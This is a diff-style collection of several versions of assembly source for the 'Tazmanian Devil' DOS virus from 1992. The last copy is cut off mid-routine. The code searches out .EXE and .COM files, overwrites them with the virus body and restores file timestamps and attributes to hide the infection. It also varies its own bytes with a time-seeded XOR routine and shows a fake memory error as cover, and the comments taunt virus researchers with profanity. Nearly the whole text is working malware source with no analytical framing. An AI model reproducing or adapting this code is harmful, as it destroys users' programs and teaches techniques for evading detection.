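+virus_msg7 db cr,lf,tab," Ü ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜ Û Û Û ÛÛÛÛÛ $"
+virus_msg8 db cr,lf,tab," ÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜ $"
+virus_msg9 db cr,lf,tab," ÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ $"
+virus_msg10 db cr,lf,tab," ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ $"
+virus_msg11 db cr,lf,tab," ÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛ ÜÜÛÛÛÛÛÛÛÛÜ $"
+virus_msg12 db cr,lf,tab," ÛÛÜÜÛÛÛÝ ÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝ $"
+virus_msg13 db cr,lf,tab," ÞÛÜßÛÛÛÛÛÛ ÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ ßß ÜÛÛÛÛÛÝßß $"
+virus_msg14 db cr,lf,tab," ßßÜÛÜÜßß ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛß ÛÛÛÝÞÛÛÛ $"
+virus_msg15 db cr,lf,tab," ÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜ $"
+virus_msg16 db cr,lf,tab," ßÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜ $"
+virus_msg17 db cr,lf,tab," ÜÜÛÛÛÜÜ ßÛÛÛÛÜ ßßßßßßß ÜÛÛÛÛÛÛÛ $"
+virus_msg18 db cr,lf,tab," ÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜ ÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜ $"
+virus_msg19 db cr,lf,tab,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ $"
+virus_msg20 db cr,lf,tab," ÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ $"
+virus_msg21 db cr,lf,tab," ßß ßÛÛÛÛÛßßßßßß ßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ $"
+virus_msg22 db cr,lf,tab,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
+compare_buf db 20 dup (?) ; Buffer to compare files in
+files_found db ?
+files_infected db ?
+orig_time dw ?
+orig_date dw ?
+orig_attr dw ?
+handle dw ?
+success db ?
+
+random_mutation: ; First decide if virus is to mutate
+mov ah,2ch ; Set up DOS function to get time
+int 21h
+cmp encrypt_val,0 ; Is this a first-run virus copy?
+je install_val ; If so, install whatever you get.
+cmp dh,15 ; Is it less than 16 seconds?
+jg find_extension ; If not, don't mutate this time
+install_val:
+cmp dl,0 ; Will we be encrypting using zero?
+je random_mutation ; If so, get a new value.
+mov encrypt_val,dl ; Otherwise, save the new value
+find_extension: ; Locate file w/ valid extension
+mov files_found,0 ; Count infected files found
+mov files_infected,4 ; BX counts file infected so far
+mov success,0
+find_exe:
+mov cx,00100111b ; Look for all flat file attributes
+mov dx,offset exe_filespec ; Check for .EXE extension first
+mov ah,4eh ; Call DOS find first service
+int 21h
+cmp ax,12h ; Are no files found?
+je find_com ; If not, nothing more to do
+call find_healthy ; Otherwise, try to find healthy .EXE
+find_com:
+mov cx,00100111b ; Look for all flat file attributes
+mov dx,offset com_filespec ; Check for .COM extension now
+mov ah,4eh ; Call DOS find first service
+int 21h
+cmp ax,12h ; Are no files found?
+je chdir ; If not, step back a directory
+call find_healthy ; Otherwise, try to find healthy .COM
+chdir: ; Routine to step back one level
+mov dx,offset newdir ; Load DX with address of pathname
+mov ah,3bh ; Change directory DOS service
+int 21h
+dec files_infected ; This counts as infecting a file
+jnz find_exe ; If we're still rolling, find another
+jmp exit_virus ; Otherwise let's pack it up
+find_healthy:
+mov bx,dta ; Point BX to address of DTA
+mov ax,[bx]+attribute ; Get the current file's attribute
+mov orig_attr,ax ; Save it
+mov ax,[bx]+timestamp ; Get the current file's time stamp
+mov orig_time,ax ; Save it
+mov ax,[bx]+datestamp ; Get the current file's data stamp
+mov orig_date,ax ; Save it
+mov dx,dta+filename ; Get the filename to change attribute
+mov cx,0 ; Clear all attribute bytes
+mov al,1 ; Set attribute sub-function
+mov ah,43h ; Call DOS service to do it
+int 21h
+mov al,2 ; Set up to open handle for read/write
+mov ah,3dh ; Open file handle DOS service
+int 21h
+mov handle,ax ; Save the file handle
+mov bx,ax ; Transfer the handle to BX for read
+mov cx,20 ; Read in the top 20 bytes of file
+mov dx,offset compare_buf ; Use the small buffer up top
+mov ah,3fh ; DOS read-from-handle service
+int 21h
+mov bx,offset compare_buf ; Adjust the encryption value
+mov ah,encrypt_val ; for accurate comparison
+mov [bx+6],ah
+mov si,code_start ; One array to compare is this file
+mov di,offset compare_buf ; The other array is the buffer
+mov ax,ds ; Transfer the DS register...
+mov es,ax ; ...to the ES register
+cld
+repe cmpsb ; Compare the buffer to the virus
+jne healthy ; If different, the file is healthy!
+call close_file ; Close it up otherwise
+inc files_found ; Chalk up another fucked up file
+continue_search:
+mov ah,4fh ; Find next DOS function
+int 21h ; Try to find another same type file
+cmp ax,12h ; Are there any more files?
+je no_more_found ; If not, get outta here
+jmp find_healthy ; If so, try the process on this one!
+no_more_found:
+ret ; Go back to where we came from
+healthy:
+mov bx,handle ; Get the file handle
+mov ah,3eh ; Close it for now
+int 21h
+mov ah,3dh ; Open it again, to reset it
+mov dx,dta+filename
+mov al,2
+int 21h
+mov handle,ax ; Save the handle again
+call infect_file ; Infect the healthy file
+call close_file ; Close down this operation
+inc success ; Indicate we did something this time
+dec files_infected ; Scratch off another file on agenda
+jz exit_virus ; If we're through, terminate
+jmp continue_search ; Otherwise, try another
+ret
+close_file:
+mov bx,handle ; Get the file handle off the stack
+mov cx,orig_time ; Get the date stamp
+mov dx,orig_date ; Get the time stamp
+mov al,1 ; Set file date/time sub-service
+mov ah,57h ; Get/Set file date and time service
+int 21h ; Call DOS
+mov bx,handle
+mov ah,3eh ; Close handle DOS service
+int 21h
+mov cx,orig_attr ; Get the file's original attribute
+mov al,1 ; Instruct DOS to put it back there
+mov dx,dta+filename ; Feed it the filename
+mov ah,43h ; Call DOS
+int 21h
+ret
+exit_virus:
+cmp files_found,16 ; Are at least 16 files infected?
+jl print_fake ; If not, keep a low profile
+cmp success,0 ; Did we infect anything?
+jg print_fake ; If so, cover it up
+mov ah,09h ; Use DOS print string service
+mov dx,offset virus_msg1 ; Load the address of the first line
+int 21h ; Print it
+mov dx,offset virus_msg2 ; Load the second line
+int 21h ; (etc)
+mov dx,offset virus_msg3
+int 21h
+mov dx,offset virus_msg4
+int 21h
+mov dx,offset virus_msg5
+int 21h
+mov dx,offset virus_msg6
+int 21h
+mov dx,offset virus_msg7
+int 21h
+mov dx,offset virus_msg8
+int 21h
+mov dx,offset virus_msg9
+int 21h
+mov dx,offset virus_msg10
+int 21h
+mov dx,offset virus_msg11
+int 21h
+mov dx,offset virus_msg12
+int 21h
+mov dx,offset virus_msg13
+int 21h
+mov dx,offset virus_msg14
+int 21h
+mov dx,offset virus_msg15
+int 21h
+mov dx,offset virus_msg16
+int 21h
+mov dx,offset virus_msg17
+int 21h
+mov dx,offset virus_msg18
+int 21h
+mov dx,offset virus_msg19
+int 21h
+mov dx,offset virus_msg20
+int 21h
+jmp terminate
+print_fake:
+mov ah,09h ; Use DOS to print fake error message
+mov dx,offset fake_msg
+int 21h
+terminate:
+mov ah,4ch ; DOS terminate process function
+int 21h ; Call DOS to get out of this program
+
+filler db 8 dup (90h) ; Pad out the file length to 666 bytes
+
+main endp
+code ends
+end main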
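--- /dev/null
+++ b/PATH_NOT_ON_PAGE_3
@@ -0,0 +1,238 @@
+cr equ 13 ; Carriage return ASCII code
+lf equ 10 ; Linefeed ASCII code
+tab equ 9 ; Tab ASCII code
+virus_size equ 2209 ; Size of the virus file
+code_start equ 100h ; Address right after PSP in memory
+dta equ 80h ; Addr of default disk transfer area
+datestamp equ 24 ; Offset in DTA of file's date stamp
+timestamp equ 22 ; Offset in DTA of file's time stamp
+filename equ 30 ; Offset in DTA of ASCIIZ filename
+attribute equ 21 ; Offset in DTA of file attribute
+
+
+code segment 'code' ; Open code segment
+assume cs:code,ds:code ; One segment for both code & data
+org code_start ; Start code image after PSP
+
+main proc near ; Code execution begins here
+jmp random_mutation ; Put the virus into action
+
+encrypt_val db 00h ; Hold value to encrypt by here
+
+infect_file:
+mov bx,handle ; Get the handle
+push bx ; Save it on the stack
+pop bx ; Get back the handle
+mov cx,virus_size ; Total number of bytes to write
+mov dx,code_start ; Buffer where code starts in memory
+mov ah,40h ; DOS write-to-handle service
+int 21h ; Write the virus code into the file
+ret ; Go back to where you came from
+
+
+virus_code:
+exe_filespec db "*.EXE",0
+com_filespec db "*.COM",0
+newdir db "..",0
+fake_msg db cr,lf,"Error #2307 - Too big to fit in memory$"
+virus_msg1 db cr,lf,tab," ÜÜÜßÜÛÛÛÜ $"
+virus_msg2 db cr,lf,tab," ÜÛßÜßÛßÜßÛÛÜÛÜ $"
+virus_msg3 db cr,lf,tab," ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜ ÛÛÛÛÛ ÛÛ ÛÛÛÛÛ $"
+virus_msg4 db cr,lf,tab," ßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ Û Û Û Û $"
+virus_msg5 db cr,lf,tab," ÜÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßß Û ÛÛÛÛ Û $"
+virus_msg6 db cr,lf,tab," ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ Ü Û Û Û Û $"
+virus_msg7 db cr,lf,tab," Ü ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜ Û Û Û ÛÛÛÛÛ $"
+virus_msg8 db cr,lf,tab," ÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜ $"
+virus_msg9 db cr,lf,tab," ÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ $"
+virus_msg10 db cr,lf,tab," ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ $"
+virus_msg11 db cr,lf,tab," ÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛ ÜÜÛÛÛÛÛÛÛÛÜ $"
+virus_msg12 db cr,lf,tab," ÛÛÜÜÛÛÛÝ ÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝ $"
+virus_msg13 db cr,lf,tab," ÞÛÜßÛÛÛÛÛÛ ÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ ßß ÜÛÛÛÛÛÝßß $"
+virus_msg14 db cr,lf,tab," ßßÜÛÜÜßß ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛß ÛÛÛÝÞÛÛÛ $"
+virus_msg15 db cr,lf,tab," ÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜ $"
+virus_msg16 db cr,lf,tab," ßÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜ $"
+virus_msg17 db cr,lf,tab," ÜÜÛÛÛÜÜ ßÛÛÛÛÜ ßßßßßßß ÜÛÛÛÛÛÛÛ $"
+virus_msg18 db cr,lf,tab," ÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜ ÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜ $"
+virus_msg19 db cr,lf,tab,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ $"
+virus_msg20 db cr,lf,tab," ÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ $"
+virus_msg21 db cr,lf,tab," ßß ßÛÛÛÛÛßßßßßß ßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ $"
+virus_msg22 db cr,lf,tab,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
+compare_buf db 20 dup (?) ; Buffer to compare files in
+files_found db ?
+files_infected db ?
+orig_time dw ?
+orig_date dw ?
+orig_attr dw ?
+handle dw ?
+success db ?
+
+random_mutation: ; First decide if virus is to mutate
+mov ah,2ch ; Set up DOS function to get time
+int 21h
+cmp encrypt_val,0 ; Is this a first-run virus copy?
+je install_val ; If so, install whatever you get.
+cmp dh,30 ; Is it less than 30 seconds?
+jg find_extension ; If not, don't mutate this time
+install_val:
+cmp dl,0 ; Will we be encrypting using zero?
+je random_mutation ; If so, get a new value.
+mov encrypt_val,dl ; Otherwise, save the new value
+find_extension: ; Locate file w/ valid extension
+mov files_found,0 ; Count infected files found
+mov files_infected,4 ; BX counts file infected so far
+mov success,0
+find_exe:
+mov cx,00100111b ; Look for all flat file attributes
+mov dx,offset exe_filespec ; Check for .EXE extension first
+mov ah,4eh ; Call DOS find first service
+int 21h
+cmp ax,12h ; Are no files found?
+je find_com ; If not, nothing more to do
+call find_healthy ; Otherwise, try to find healthy .EXE
+find_com:
+mov cx,00100111b ; Look for all flat file attributes
+mov dx,offset com_filespec ; Check for .COM extension now
+mov ah,4eh ; Call DOS find first service
+int 21h
+cmp ax,12h ; Are no files found?
+je chdir ; If not, step back a directory
+call find_healthy ; Otherwise, try to find healthy .COM
+chdir: ; Routine to step back one level
+mov dx,offset newdir ; Load DX with address of pathname
+mov ah,3bh ; Change directory DOS service
+int 21h
+dec files_infected ; This counts as infecting a file
+jnz find_exe ; If we're still rolling, find another
+jmp exit_virus ; Otherwise let's pack it up
+find_healthy:
+mov bx,dta ; Point BX to address of DTA
+mov ax,[bx]+attribute ; Get the current file's attribute
+mov orig_attr,ax ; Save it
+mov ax,[bx]+timestamp ; Get the current file's time stamp
+mov orig_time,ax ; Save it
+mov ax,[bx]+datestamp ; Get the current file's data stamp
+mov orig_date,ax ; Save it
+mov dx,dta+filename ; Get the filename to change attribute
+mov cx,0 ; Clear all attribute bytes
+mov al,1 ; Set attribute sub-function
+mov ah,43h ; Call DOS service to do it
+int 21h
+mov al,2 ; Set up to open handle for read/write
+mov ah,3dh ; Open file handle DOS service
+int 21h
+mov handle,ax ; Save the file handle
+mov bx,ax ; Transfer the handle to BX for read
+mov cx,20 ; Read in the top 20 bytes of file
+mov dx,offset compare_buf ; Use the small buffer up top
+mov ah,3fh ; DOS read-from-handle service
+int 21h
+mov bx,offset compare_buf ; Adjust the encryption value
+mov ah,encrypt_val ; for accurate comparison
+mov [bx+6],ah
+mov si,code_start ; One array to compare is this file
+mov di,offset compare_buf ; The other array is the buffer
+mov ax,ds ; Transfer the DS register...
+mov es,ax ; ...to the ES register
+cld
+repe cmpsb ; Compare the buffer to the virus
+jne healthy ; If different, the file is healthy!
+call close_file ; Close it up otherwise
+inc files_found ; Chalk up another fucked up file
+continue_search:
+mov ah,4fh ; Find next DOS function
+int 21h ; Try to find another same type file
+cmp ax,12h ; Are there any more files?
+je no_more_found ; If not, get outta here
+jmp find_healthy ; If so, try the process on this one!
+no_more_found:
+ret ; Go back to where we came from
+healthy:
+mov bx,handle ; Get the file handle
+mov ah,3eh ; Close it for now
+int 21h
+mov ah,3dh ; Open it again, to reset it
+mov dx,dta+filename
+mov al,2
+int 21h
+mov handle,ax ; Save the handle again
+call infect_file ; Infect the healthy file
+call close_file ; Close down this operation
+inc success ; Indicate we did something this time
+dec files_infected ; Scratch off another file on agenda
+jz exit_virus ; If we're through, terminate
+jmp continue_search ; Otherwise, try another
+ret
+close_file:
+mov bx,handle ; Get the file handle off the stack
+mov cx,orig_time ; Get the date stamp
+mov dx,orig_date ; Get the time stamp
+mov al,1 ; Set file date/time sub-service
+mov ah,57h ; Get/Set file date and time service
+int 21h ; Call DOS
+mov bx,handle
+mov ah,3eh ; Close handle DOS service
+int 21h
+mov cx,orig_attr ; Get the file's original attribute
+mov al,1 ; Instruct DOS to put it back there
+mov dx,dta+filename ; Feed it the filename
+mov ah,43h ; Call DOS
+int 21h
+ret
+exit_virus:
+cmp files_found,2 ; Are at least 2 files infected?
+jl print_fake ; If not, keep a low profile
+cmp success,0 ; Did we infect anything?
+jg print_fake ; If so, cover it up
+mov ah,09h ; Use DOS print string service
+mov dx,offset virus_msg1 ; Load the address of the first line
+int 21h ; Print it
+mov dx,offset virus_msg2 ; Load the second line
+int 21h ; (etc)
+mov dx,offset virus_msg3
+int 21h
+mov dx,offset virus_msg4
+int 21h
+mov dx,offset virus_msg5
+int 21h
+mov dx,offset virus_msg6
+int 21h
+mov dx,offset virus_msg7
+int 21h
+mov dx,offset virus_msg8
+int 21h
+mov dx,offset virus_msg9
+int 21h
+mov dx,offset virus_msg10
+int 21h
+mov dx,offset virus_msg11
+int 21h
+mov dx,offset virus_msg12
+int 21h
+mov dx,offset virus_msg13
+int 21h
+mov dx,offset virus_msg14
+int 21h
+mov dx,offset virus_msg15
+int 21h
+mov dx,offset virus_msg16
+int 21h
+mov dx,offset virus_msg17
+int 21h
+mov dx,offset virus_msg18
+int 21h
+mov dx,offset virus_msg19
+int 21h
+mov dx,offset virus_msg20
+int 21h
+jmp terminate
+print_fake:
+mov ah,09h ; Use DOS to print fake error message
+mov dx,offset fake_msg
+int 21h
+terminate:
+mov ah,4ch ; DOS terminate process function
+int 21h ; Call DOS to get out of this program
+
+main endp
+code ends
+end main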
@ -0,0 +1,278 @@
cr equ 13 ; This VIRUS was written 12-14-1992
lf equ 10 ; AND QUIT READING MY SOURCE CODE
tab equ 9 ; YOU SHITHEAD FUCKNOSE DOUCHE BAG
virus_size equ 2276 ; QUEERBAIT VIRUS TRACKER WANNA-BE!
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
;---------------------------------------------------------------------
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
;---------------------------------------------------------------------
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
; ---------- Encrypt, save, and restore the virus code -----------
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
|
||||
call encrypt_decrypt ; Restore the code as it was
|
||||
ret ; Go back to where you came from
|
||||
|
||||
; --------------- Encrypt or decrypt the virus code ----------------
|
||||
encrypt_decrypt:
|
||||
mov bx,offset virus_code ; Get address to start encrypt/decrypt
|
||||
xor_loop: ; Start cycle here
|
||||
mov ah,[bx] ; Get the current byte
|
||||
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
|
||||
mov [bx],ah ; Put it back where we got it
|
||||
inc bx ; Move BX ahead a byte
|
||||
cmp bx,offset virus_code+virus_size ; Are we at the end?
|
||||
jle xor_loop ; If not, do another cycle
|
||||
ret ; and go back where we came from
|
||||
|
||||
;-----------------------------------------------------------------------
|
||||
; The rest of the code from here on remains encrypted until run-time,
|
||||
; using a fundamental XOR technique that changes via CMT.
|
||||
;-----------------------------------------------------------------------
|
||||
virus_code:
|
||||
|
||||
;----------------------------------------------------------------------------
|
||||
; All strings are kept here in the file, and automatically encrypted.
|
||||
; Please don't be a lamer and change the strings and say you wrote a virus.
|
||||
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
|
||||
; changes, even when the strings stay the same.
|
||||
;----------------------------------------------------------------------------
|
||||
exe_filespec db "*.EXE",0
|
||||
com_filespec db "*.COM",0
|
||||
newdir db "..",0
|
||||
fake_msg db cr,lf,"Program too big to fit in memory $"
|
||||
virus_msg1 db cr,lf,"*TAKE THE DAY OFF COMPLIMENTS OF THE TAZMANIAN DEVIL AND Âô<C383> W<>’sˆl!!* $"
|
||||
virus_msg2 db cr,lf,"ADH ADH ADH ADH ADH ADHÜÜÜßÜÛÛÛÜADH ADH ADH ADH ADH ADH ADH ADH ADH ADH $"
|
||||
virus_msg3 db cr,lf,"ADH ADH ADH ADH ADH AÜÛßÜßÛßÜßÛÛÜÛÜ ADH ADH ADH ADH ADH ADH ADH ADH ADH $"
|
||||
virus_msg4 db cr,lf,"ADH ADH ADH ADH ADH ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜDH ADH ADH ÛÛÛÛÛ ÛÛ ÛÛÛÛÛADH $"
|
||||
virus_msg5 db cr,lf,"ADH ADH ADH ADßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ ADH ADH ADÛ ADÛ AÛH ADÛ ADH $"
|
||||
virus_msg6 db cr,lf,"ADH ADH ADH AÛÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßßH ADH ADÛ ADÛÛÛÛH AÛH ADH $"
|
||||
virus_msg7 db cr,lf,"ADH ADH ADH ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ ÜADH ADÛ ADÛ AÛH ÛDH ADH $"
|
||||
virus_msg8 db cr,lf,"ADH ADH ADHÜ ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜH ADÛ ADÛ AÛHÛÛÛÛÛADH $"
|
||||
virus_msg9 db cr,lf,"ADH ADH ADÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜADH ADH ADH ADH ADH $"
|
||||
virus_msg10 db cr,lf,"ADH ADH AÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛDH ADH ADH ADH ADH $"
|
||||
virus_msg11 db cr,lf,"ADH ADH ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ ADH ADH ADH ADH$"
|
||||
virus_msg12 db cr,lf,"ADH ADHÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛAÜÜÛÛÛÛÛÛÛÛÜADH ADH ADH ADH$"
|
||||
virus_msg13 db cr,lf,"ADH ADÛÛÜÜÛÛÛÝH ADÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝH ADH ADH ADH$"
|
||||
virus_msg14 db cr,lf,"ADH ADÞÛÜßÛÛÛÛÛÛADHÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ Aßß ÜÛÛÛÛÛÝßßDH ADH ADH ADH$"
|
||||
virus_msg15 db cr,lf,"ADH ADHßßÜÛÜÜßß ADH ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛßH ADHÛÛÛÝÞÛÛÛ ADH ADH ADH ADH$"
|
||||
virus_msg16 db cr,lf,"ADH ADH ADH ADHÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜH ADH ADH ADH ADH AHD ADH$"
|
||||
virus_msg17 db cr,lf,"ADH ADH ADH ADßÛÛÛÛÛßßß ADH ßßÛÛÛÛÛÛÛÛHßÛÛÛÛÛÛÜ ADH ADH ADH ADH ADH ADH$"
|
||||
virus_msg18 db cr,lf,"ADH ÜÜÛÛÛÜÜ ADH ßÛÛÛÛÜH ADH ADßßßßßßßDH ÜÛÛÛÛÛÛÛADH ADH ADH ADH ADH ADH$"
|
||||
virus_msg19 db cr,lf,"ADÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜADH ADH ADH AÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜDH ADH ADH ADH$"
|
||||
virus_msg20 db cr,lf,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛDH ADH ADH ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ ADH ADH ADH$"
|
||||
virus_msg21 db cr,lf,"AÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßßADH ADH ADH ADHßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ ADH ADH ADH$"
|
||||
virus_msg22 db cr,lf,"ADßß ßÛÛÛÛÛßßßßßßDH ADH ADH ADH ADH ADH ADßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ ADH ADH ADH$"
|
||||
virus_msg23 db cr,lf,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector$"
|
||||
compare_buf db 20 dup (?) ; Buffer to compare files in
|
||||
files_found db ?
|
||||
files_infected db ?
|
||||
orig_time dw ?
|
||||
orig_date dw ?
|
||||
orig_attr dw ?
|
||||
handle dw ?
|
||||
success db ?
|
||||
|
||||
random_mutation: ; First decide if virus is to mutate
|
||||
mov ah,2ch ; Set up DOS function to get time
|
||||
int 21h
|
||||
cmp encrypt_val,0 ; Is this a first-run virus copy?
|
||||
je install_val ; If so, install whatever you get.
|
||||
cmp dh,15 ; Is it less than 16 seconds?
|
||||
jg find_extension ; If not, don't mutate this time
|
||||
install_val:
|
||||
cmp dl,0 ; Will we be encrypting using zero?
|
||||
je random_mutation ; If so, get a new value.
|
||||
mov encrypt_val,dl ; Otherwise, save the new value
|
||||
find_extension: ; Locate file w/ valid extension
|
||||
mov files_found,0 ; Count infected files found
|
||||
mov files_infected,4 ; BX counts file infected so far
|
||||
mov success,0
|
||||
find_exe:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset exe_filespec ; Check for .EXE extension first
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je find_com ; If not, nothing more to do
|
||||
call find_healthy ; Otherwise, try to find healthy .EXE
|
||||
find_com:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset com_filespec ; Check for .COM extension now
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je chdir ; If not, step back a directory
|
||||
call find_healthy ; Otherwise, try to find healthy .COM
|
||||
chdir: ; Routine to step back one level
|
||||
mov dx,offset newdir ; Load DX with address of pathname
|
||||
mov ah,3bh ; Change directory DOS service
|
||||
int 21h
|
||||
dec files_infected ; This counts as infecting a file
|
||||
jnz find_exe ; If we're still rolling, find another
|
||||
jmp exit_virus ; Otherwise let's pack it up
|
||||
find_healthy:
|
||||
mov bx,dta ; Point BX to address of DTA
|
||||
mov ax,[bx]+attribute ; Get the current file's attribute
|
||||
mov orig_attr,ax ; Save it
|
||||
mov ax,[bx]+timestamp ; Get the current file's time stamp
|
||||
mov orig_time,ax ; Save it
|
||||
mov ax,[bx]+datestamp ; Get the current file's data stamp
|
||||
mov orig_date,ax ; Save it
|
||||
mov dx,dta+filename ; Get the filename to change attribute
|
||||
mov cx,0 ; Clear all attribute bytes
|
||||
mov al,1 ; Set attribute sub-function
|
||||
mov ah,43h ; Call DOS service to do it
|
||||
int 21h
|
||||
mov al,2 ; Set up to open handle for read/write
|
||||
mov ah,3dh ; Open file handle DOS service
|
||||
int 21h
|
||||
mov handle,ax ; Save the file handle
|
||||
mov bx,ax ; Transfer the handle to BX for read
|
||||
mov cx,20 ; Read in the top 20 bytes of file
|
||||
mov dx,offset compare_buf ; Use the small buffer up top
|
||||
mov ah,3fh ; DOS read-from-handle service
|
